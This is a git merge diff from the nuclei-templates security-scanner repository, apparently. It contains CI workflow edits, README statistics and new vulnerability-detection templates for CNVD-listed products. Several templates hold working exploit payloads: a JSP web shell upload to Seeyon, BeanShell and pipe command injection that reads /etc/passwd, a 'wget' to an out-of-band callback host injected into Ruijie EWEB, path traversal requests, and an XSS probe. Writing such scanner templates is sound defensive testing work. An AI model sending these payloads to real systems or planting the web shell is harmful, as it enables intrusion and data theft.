Merge branch 'master' into master

patch-1
Prince Chaddha 2022-05-23 13:30:04 +05:30 committed by GitHub
commit 09de9e19ce
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3247 changed files with 51500 additions and 11868 deletions

View File

@ -58,6 +58,8 @@ We have also added a set of templates to help you understand how things work.
Nuclei-templates is powered by major contributions from the community.
[Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Repobeats analytics image")
💬 Discussion
-----

View File

@ -10,23 +10,25 @@ jobs:
docs:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
with:
persist-credentials: false
fetch-depth: 0
token: ${{ secrets.GITHUB_TOKEN }}
- uses: actions/checkout@v2
- uses: actions/setup-go@v2
with:
go-version: 1.17
- name: Get Github tag
id: meta
run: |
echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)"
- name: Setup CVE annotate
if: steps.meta.outputs.tag != ''
env:
VERSION: ${{ steps.meta.outputs.tag }}
run: |
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/cve-annotate.zip
sudo unzip cve-annotate.zip -d /usr/local/bin
working-directory: /tmp
- name: Generate CVE Annotations
id: cve-annotate
run: |
if ! which cve-annotate > /dev/null; then
echo -e "Command cve-annotate not found! Installing\c"
go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev
fi
cve-annotate -i ./cves/ -d .
echo "::set-output name=changes::$(git status -s | wc -l)"
@ -35,6 +37,7 @@ jobs:
run: |
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git pull
git add cves
git commit -m "Auto Generated CVE annotations [$(date)] :robot:" -a

37
.github/workflows/new-templates.yml vendored Normal file
View File

@ -0,0 +1,37 @@
name: 🥳 New Template List
on:
push:
branches:
- master
workflow_dispatch:
jobs:
templates:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
- uses: actions/checkout@master
with:
token: ${{ secrets.GITHUB_TOKEN }}
persist-credentials: false
fetch-depth: 0
- name: Generate new template list
id: new-additions
run: |
git pull
git diff --name-only --diff-filter=A $(git tag | tail -n 1) @ . | grep .yaml | tee .new-additions
- name: Commit files
run: |
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git add .new-additions -f
git commit --allow-empty -m "Auto Generated New Template Addition List [$(date)] :robot:" -a
- name: Push changes
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: ${{ github.ref }}

View File

@ -0,0 +1,29 @@
name: 📑 Template-DB Indexer
on:
push:
branches:
- master
workflow_dispatch:
jobs:
index:
runs-on: ubuntu-latest
steps:
- uses: actions/setup-go@v2
with:
go-version: 1.17
- name: Intalling Indexer
run: |
git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github
git clone https://github.com/projectdiscovery/nucleish-api.git
cd nucleish-api/cmd/generate-index/
go install
- name: Generate Index
env:
AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }}
AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }}
run: |
generate-index -mode templates

View File

@ -6,24 +6,24 @@ jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
- uses: actions/setup-go@v2
with:
go-version: 1.17
- uses: actions/checkout@v2
- name: Cache Go
id: cache-go
uses: actions/cache@v2
with:
path: /home/runner/go
key: ${{ runner.os }}-go
- name: Installing Nuclei
if: steps.cache-go.outputs.cache-hit != 'true'
- name: Get Github tag
id: meta
run: |
go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)"
- name: Setup Nuclei
if: steps.meta.outputs.tag != ''
env:
VERSION: ${{ steps.meta.outputs.tag }}
run: |
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip
sudo unzip nuclei*.zip -d /usr/local/bin
working-directory: /tmp
- name: Template Validation
run: |
cp -r ${{ github.workspace }} $HOME
nuclei -validate -t .
nuclei -validate -w ./workflows

View File

@ -1,6 +1,9 @@
name: 🗒 Templates Stats
on:
push:
tags:
- '*'
workflow_dispatch:
jobs:
@ -49,4 +52,4 @@ jobs:
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: ${{ github.ref }}
branch: master

14
.new-additions Normal file
View File

@ -0,0 +1,14 @@
cves/2013/CVE-2013-6281.yaml
cves/2018/CVE-2018-18608.yaml
cves/2019/CVE-2019-18371.yaml
cves/2021/CVE-2021-45428.yaml
cves/2022/CVE-2022-0346.yaml
cves/2022/CVE-2022-21500.yaml
exposed-panels/jupyter-notebook.yaml
exposed-panels/looker-panel.yaml
exposures/files/xampp-environment-variables.yaml
miscellaneous/robots-txt-endpoint.yaml
ssl/self-signed-ssl.yaml
token-spray/api-debounce.yaml
token-spray/api-tatum.yaml
vulnerabilities/dedecms/dedecms-config-xss.yaml

View File

@ -10,7 +10,9 @@
tags:
- "fuzz"
- "dos"
- "misc"
# files is a list of files to ignore template execution
# unless asked for by the user.
# files:
# - cves/2020/CVE-2020-35489.yaml

View File

@ -24,5 +24,5 @@ I've validated this template locally?
- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)

View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 907 | dhiyaneshdk | 338 | cves | 913 | info | 903 | http | 2477 |
| lfi | 377 | daffainfo | 333 | vulnerabilities | 347 | high | 691 | file | 57 |
| panel | 318 | pikpikcu | 286 | exposed-panels | 318 | medium | 516 | network | 47 |
| xss | 283 | pdteam | 216 | technologies | 220 | critical | 322 | dns | 12 |
| wordpress | 270 | geeknik | 172 | exposures | 196 | low | 166 | | |
| exposure | 250 | dwisiswant0 | 156 | misconfiguration | 163 | | | | |
| rce | 230 | pussycat0x | 90 | token-spray | 127 | | | | |
| tech | 223 | gy741 | 88 | takeovers | 65 | | | | |
| cve2021 | 188 | 0x_akoko | 76 | default-logins | 63 | | | | |
| wp-plugin | 186 | princechaddha | 72 | file | 57 | | | | |
| cve | 1168 | daffainfo | 564 | cves | 1172 | info | 1198 | http | 3209 |
| panel | 517 | dhiyaneshdk | 423 | exposed-panels | 525 | high | 885 | file | 68 |
| lfi | 464 | pikpikcu | 315 | vulnerabilities | 453 | medium | 667 | network | 50 |
| xss | 371 | pdteam | 262 | technologies | 256 | critical | 415 | dns | 17 |
| wordpress | 368 | geeknik | 179 | exposures | 204 | low | 182 | | |
| rce | 296 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | |
| exposure | 294 | princechaddha | 137 | workflows | 187 | | | | |
| cve2021 | 289 | 0x_akoko | 134 | token-spray | 155 | | | | |
| tech | 272 | gy741 | 119 | default-logins | 96 | | | | |
| wp-plugin | 268 | pussycat0x | 116 | file | 68 | | | | |
**190 directories, 2663 files**.
**262 directories, 3566 files**.
</td>
</tr>
@ -71,6 +71,8 @@ We have also added a set of templates to help you understand how things work.
Nuclei-templates is powered by major contributions from the community.
[Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Repobeats analytics image")
💬 Discussion
-----

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large Load Diff

View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 907 | dhiyaneshdk | 338 | cves | 913 | info | 903 | http | 2477 |
| lfi | 377 | daffainfo | 333 | vulnerabilities | 347 | high | 691 | file | 57 |
| panel | 318 | pikpikcu | 286 | exposed-panels | 318 | medium | 516 | network | 47 |
| xss | 283 | pdteam | 216 | technologies | 220 | critical | 322 | dns | 12 |
| wordpress | 270 | geeknik | 172 | exposures | 196 | low | 166 | | |
| exposure | 250 | dwisiswant0 | 156 | misconfiguration | 163 | | | | |
| rce | 230 | pussycat0x | 90 | token-spray | 127 | | | | |
| tech | 223 | gy741 | 88 | takeovers | 65 | | | | |
| cve2021 | 188 | 0x_akoko | 76 | default-logins | 63 | | | | |
| wp-plugin | 186 | princechaddha | 72 | file | 57 | | | | |
| cve | 1168 | daffainfo | 564 | cves | 1172 | info | 1198 | http | 3209 |
| panel | 517 | dhiyaneshdk | 423 | exposed-panels | 525 | high | 885 | file | 68 |
| lfi | 464 | pikpikcu | 315 | vulnerabilities | 453 | medium | 667 | network | 50 |
| xss | 371 | pdteam | 262 | technologies | 256 | critical | 415 | dns | 17 |
| wordpress | 368 | geeknik | 179 | exposures | 204 | low | 182 | | |
| rce | 296 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | |
| exposure | 294 | princechaddha | 137 | workflows | 187 | | | | |
| cve2021 | 289 | 0x_akoko | 134 | token-spray | 155 | | | | |
| tech | 272 | gy741 | 119 | default-logins | 96 | | | | |
| wp-plugin | 268 | pussycat0x | 116 | file | 68 | | | | |

View File

@ -0,0 +1,25 @@
id: CNVD-2018-13393
info:
name: Metinfo LFI
author: ritikchaddha
severity: high
reference:
- https://paper.seebug.org/676/
tags: metinfo,cnvd,cvnd2018,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/include/thumb.php?dir=http\..\admin\login\login_check.php'
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<?php"
- "login_met_cookie($metinfo_admin_name);"
condition: and

View File

@ -3,10 +3,16 @@ id: CNVD-2019-01348
info:
name: Xiuno BBS CNVD-2019-01348
author: princechaddha
severity: medium
severity: high
description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
tags: xiuno,cnvd
reference:
- https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 7.5
cwe-id: CWE-284
remediation: Upgrade to the latest version of Xiuno BBS or switch to a supported product.
tags: xiuno,cnvd,cnvd2019
requests:
- method: GET
@ -14,14 +20,18 @@ requests:
- "{{BaseURL}}/install/"
headers:
Accept-Encoding: deflate
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "/view/js/xiuno.js"
- "Choose Language (选择语言)"
part: body
condition: and
# Enhanced by mp on 2022/01/26

View File

@ -0,0 +1,37 @@
id: CNVD-2019-06255
info:
name: CatfishCMS RCE
author: Lark-Lab
severity: critical
description: CatfishCMS 4.8.54 contains a remote command execution vulnerability in the "method" parameter.
reference:
- https://its401.com/article/yun2diao/91344725
- https://github.com/xwlrbh/Catfish/issues/4
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
remediation: Upgrade to CatfishCMS version 4.8.54 or later.
tags: rce,cnvd,catfishcms,cnvd2019
requests:
- method: GET
path:
- "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'OS'
- 'PATH'
- 'SHELL'
- 'USER'
condition: and
# Enhanced by cs on 2022/02/28

View File

@ -0,0 +1,54 @@
id: CNVD-2019-19299
info:
name: Zhiyuan A8 - Remote Code Execution
author: daffainfo
severity: critical
description: Zhiyuan A8 is susceptible to remote code execution because of an arbitrary file write issue.
reference:
- https://www.cxyzjd.com/article/guangying177/110177339
- https://github.com/sectestt/CNVD-2019-19299
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
tags: zhiyuan,cnvd,cnvd2019,rce
requests:
- raw:
- |
POST /seeyon/htmlofficeservlet HTTP/1.1
Host: {{Hostname}}
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
= WUghPB3szB3Xwg66 the CREATEDATE
recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId = wV66
originalCreateDate = wUghPB3szB3Xwg66
FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs
needReadFile = yRWZdAS6
originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("<pre>" +excuteCmd(request.getParameter("{{randstr}}")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
- |
GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_1, "htmoffice operate")'
- 'contains(body_2, "Windows IP")'
condition: and
# Enhanced by mp on 2022/05/12

View File

@ -0,0 +1,30 @@
id: CNVD-2019-32204
info:
name: Fanwei e-cology <=9.0 - Remote Code Execution
author: daffainfo
severity: critical
description: Fanwei e-cology <=9.0 is susceptible to remote code execution vulnerabilities. Remote attackers can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system.
reference:
- https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
tags: fanwei,cnvd,cnvd2019,rce
requests:
- raw:
- |
POST /bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw
matchers:
- type: regex
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/05/12

View File

@ -5,8 +5,9 @@ info:
author: princechaddha
severity: medium
description: Xunyou cms has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information.
reference: https://www.cnvd.org.cn/flaw/show/2025171
tags: xunchi,lfi,cnvd
reference:
- https://www.cnvd.org.cn/flaw/show/2025171
tags: xunchi,lfi,cnvd,cnvd2020
requests:
- method: GET
@ -18,9 +19,10 @@ requests:
- type: status
status:
- 200
- type: word
part: body
words:
- "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"
- "display_errors"
part: body
condition: and

View File

@ -0,0 +1,33 @@
id: CNVD-2020-46552
info:
name: Sangfor EDR - Remote Code Execution
author: ritikchaddha
severity: critical
description: Sangfor Endpoint Monitoring and Response Platform (EDR) contains a remote code execution vulnerability. An attacker could exploit this vulnerability by constructing an HTTP request which could execute arbitrary commands on the target host.
reference:
- https://www.modb.pro/db/144475
- https://blog.csdn.net/bigblue00/article/details/108434009
- https://cn-sec.com/archives/721509.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id:
cwe-id: CWE-77
tags: cnvd,cnvd2020,sangfor,rce
requests:
- method: GET
path:
- "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php"
matchers:
- type: dsl
dsl:
- 'contains(body, "$show_input = function($info)")'
- 'contains(body, "$strip_slashes($host)")'
- 'contains(body, "Log Helper")'
- 'status_code == 200'
condition: and
# Enhanced by mp on 2022/05/18

View File

@ -4,8 +4,9 @@ info:
name: Ruijie Smartweb Default Password
author: pikpikcu
severity: low
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167
tags: ruijie,default-login,cnvd
reference:
- https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167
tags: ruijie,default-login,cnvd,cnvd2020
requests:
- method: POST
@ -17,12 +18,11 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Level was: LEVEL15"
- "/WEB_VMS/LEVEL15/"
part: body
condition: and
- type: status

View File

@ -1,11 +1,12 @@
id: CNVD-2020-62422
info:
name: Seeyon readfile(CNVD-2020-62422)
name: Seeyon - Arbitrary File Retrieval
author: pikpikcu
severity: medium
reference: https://blog.csdn.net/m0_46257936/article/details/113150699
tags: lfi,cnvd
reference:
- https://blog.csdn.net/m0_46257936/article/details/113150699
tags: lfi,cnvd,cnvd2020,seeyon
requests:
- method: GET
@ -17,13 +18,15 @@ requests:
- type: status
status:
- 200
- type: word
part: header
words:
- "application/x-msdownload"
condition: and
part: header
- type: word
part: body
words:
- "ctpDataSource.password"
condition: and
part: body

View File

@ -0,0 +1,44 @@
id: CNVD-2020-67113
info:
name: H5S CONSOLE Unauthorized Access Vulnerability (CNVD-2020-67113)
author: ritikchaddha
severity: high
description: Zero Vision Technology (Shanghai) Co., Ltd. H5S CONSOLE Exists Unauthorized Access Vulnerability
reference:
- https://vul.wangan.com/a/CNVD-2020-67113
metadata:
shodan-query: http.title:"H5S CONSOLE"
tags: h5s,unauth,h5sconsole,cnvd,cnvd2020
requests:
- method: GET
path:
- "{{BaseURL}}/api/v1/GetSrc"
- "{{BaseURL}}/api/v1/GetDevice"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'strUser'
- 'strPasswd'
condition: and
- type: word
part: body
words:
- 'H5_AUTO'
- 'H5_DEV'
condition: or
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200

View File

@ -1,11 +1,17 @@
id: CNVD-2020-68596
info:
name: WeiPHP 5.0 Path Traversal
name: WeiPHP 5.0 - Path Traversal
author: pikpikcu
severity: critical
reference: http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html
tags: weiphp,lfi,cnvd
description: WeiPHP 5.0 is susceptible to directory traversal attacks.
severity: high
reference:
- http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cwe-id: CWE-22
tags: weiphp,lfi,cnvd,cnvd2020
requests:
- raw:
@ -34,9 +40,11 @@ requests:
matchers:
- type: word
part: body
words:
- https://weiphp.cn
- WeiPHP
- DB_PREFIX
condition: and
part: body
# Enhanced by mp on 2022/05/12

View File

@ -0,0 +1,30 @@
id: CNVD-2021-01931
info:
name: Ruoyi Management System - Arbitrary File Retrieval
author: daffainfo,ritikchaddha
severity: high
reference:
- https://disk.scan.cm/All_wiki/%E4%BD%A9%E5%A5%87PeiQi-WIKI-POC-2021-7-20%E6%BC%8F%E6%B4%9E%E5%BA%93/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%20CNVD-2021-01931.md?hash=zE0KEPGJ
tags: ruoyi,lfi,cnvd,cnvd2021
requests:
- method: GET
path:
- "{{BaseURL}}/common/download/resource?resource=/profile/../../../../etc/passwd"
- "{{BaseURL}}/common/download/resource?resource=/profile/../../../../Windows/win.ini"
matchers-condition: or
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0"
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and

View File

@ -0,0 +1,32 @@
id: CNVD-2021-09650
info:
name: Ruijie EWEB Gateway Platform - Remote Command Injection
author: daffainfo
severity: critical
description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks.
reference:
- http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
tags: ruijie,cnvd,cnvd2021,rce
requests:
- raw:
- |
POST /guest_auth/guestIsUp.php
Host: {{Hostname}}
mac=1&ip=127.0.0.1|wget {{interactsh-url}}
unsafe: true
matchers:
- type: word
part: interactsh_protocol
name: http
words:
- "http"
# Enhanced by mp on 2022/05/12

View File

@ -4,8 +4,9 @@ info:
name: EEA Information Disclosure
author: pikpikcu
severity: high
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
tags: config,exposure,cnvd
reference:
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
tags: config,exposure,cnvd,cnvd2021
requests:
- method: GET
@ -14,7 +15,6 @@ requests:
matchers-condition: and
matchers:
- type: regex
regex:
- "<username>(.*?)</username>"

View File

@ -0,0 +1,45 @@
id: CNVD-2021-14536
info:
name: Ruijie RG-UAC Unified Internet Behavior Management Audit System - Information Disclosure
author: daffainfo
severity: high
description: Ruijie RG-UAC Unified Internet Behavior Management Audit System is susceptible to information disclosure. Attackers could obtain user accounts and passwords by reviewing the source code of web pages, resulting in the leakage of administrator user authentication information.
reference:
- https://www.adminxe.com/2163.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
fofa-query: title="RG-UAC登录页面"
tags: ruijie,cnvd,cnvd2021,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/get_dkey.php?user=admin"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"pre_define"'
- '"auth_method"'
- '"name"'
- '"password"'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '"role":"super_admin",(["a-z:,0-9]+),"lastpwdtime":'
# Enhanced by mp on 2022/03/28

View File

@ -4,8 +4,13 @@ info:
name: ShopXO Download File Read
author: pikpikcu
severity: high
reference: https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
tags: shopxo,lfi
reference:
- https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
metadata:
verified: true
shodan-query: title:"ShopXO企业级B2C电商系统提供商"
fofa-query: app="ShopXO企业级B2C电商系统提供商"
tags: shopxo,lfi,cnvd,cnvd2021
requests:
- raw:
@ -16,11 +21,12 @@ requests:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/03/17

View File

@ -0,0 +1,36 @@
id: CNVD-2021-15824
info:
name: EmpireCMS DOM Cross Site-Scripting
author: daffainfo
severity: high
description: EmpireCMS is vulnerable to a DOM based cross-site scripting attack.
reference:
- https://sourceforge.net/projects/empirecms/
- https://www.bilibili.com/read/cv10441910
- https://vul.wangan.com/a/CNVD-2021-15824
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
tags: empirecms,cnvd,cnvd2021,xss,domxss
requests:
- method: GET
path:
- "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(1)"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'if(Request("url")!=0)'
- 'href=\""+Request("url")+"\"'
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/03/23

View File

@ -0,0 +1,36 @@
id: CNVD-2021-17369
info:
name: Ruijie Smartweb Management System Password Information Disclosure
author: pikpikcu
severity: high
description: The wireless smartweb management system of Ruijie Networks Co., Ltd. has a logic flaw. An attacker can obtain the administrator account and password from a low-privileged user, thereby escalating the low-level privilege to the administrator's privilege.
reference:
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
tags: ruijie,disclosure,cnvd,cnvd2021
requests:
- method: GET
path:
- "{{BaseURL}}/web/xml/webuser-auth.xml"
headers:
Cookie: login=1; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<userauth>"
- "<password>"
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/03/16

View File

@ -0,0 +1,36 @@
id: CNVD-2021-26422
info:
name: eYouMail - Remote Code Execution
author: daffainfo
severity: critical
description: eYouMail is susceptible to a remote code execution vulnerability.
reference:
- https://github.com/ltfafei/my_POC/blob/master/CNVD-2021-26422_eYouMail/CNVD-2021-26422_eYouMail_RCE_POC.py
- https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/%E4%BA%BF%E9%82%AE%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20(CNVD-2021-26422).md
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
tags: eyoumail,rce,cnvd,cnvd2021
requests:
- raw:
- |
POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
type='|cat /etc/passwd||'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/05/12

View File

@ -1,11 +1,15 @@
id: landray-oa-fileread
id: CNVD-2021-28277
info:
name: Landray-OA Fileread
author: pikpikcu
name: Landray-OA Arbitrary - Arbitrary File Retrieval
author: pikpikcu,daffainfo
severity: high
reference: https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
tags: landray,lfi
reference:
- https://www.aisoutu.com/a/1432457
- https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
metadata:
fofa-query: app="Landray OA system"
tags: landray,lfi,cnvd,cnvd2021
requests:
- raw:
@ -25,6 +29,7 @@ requests:
var={"body":{"file":"file:///c://windows/win.ini"}}
stop-at-first-match: true
matchers-condition: and
matchers:

View File

@ -7,7 +7,7 @@ info:
reference:
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
- https://www.cnvd.org.cn/webinfo/show/6491
tags: beanshell,rce,cnvd
tags: beanshell,rce,cnvd,cnvd2021,yonyou
requests:
- raw:
@ -27,7 +27,6 @@ requests:
matchers-condition: and
matchers:
- type: regex
regex:
- "uid="

View File

@ -0,0 +1,48 @@
id: CNVD-2021-49104
info:
name: Pan Micro E-office File Uploads
author: pikpikcu
severity: critical
description: The Pan Wei Micro E-office version running allows arbitrary file uploads from a remote attacker.
reference:
- https://chowdera.com/2021/12/202112200602130067.html
- http://v10.e-office.cn
classification:
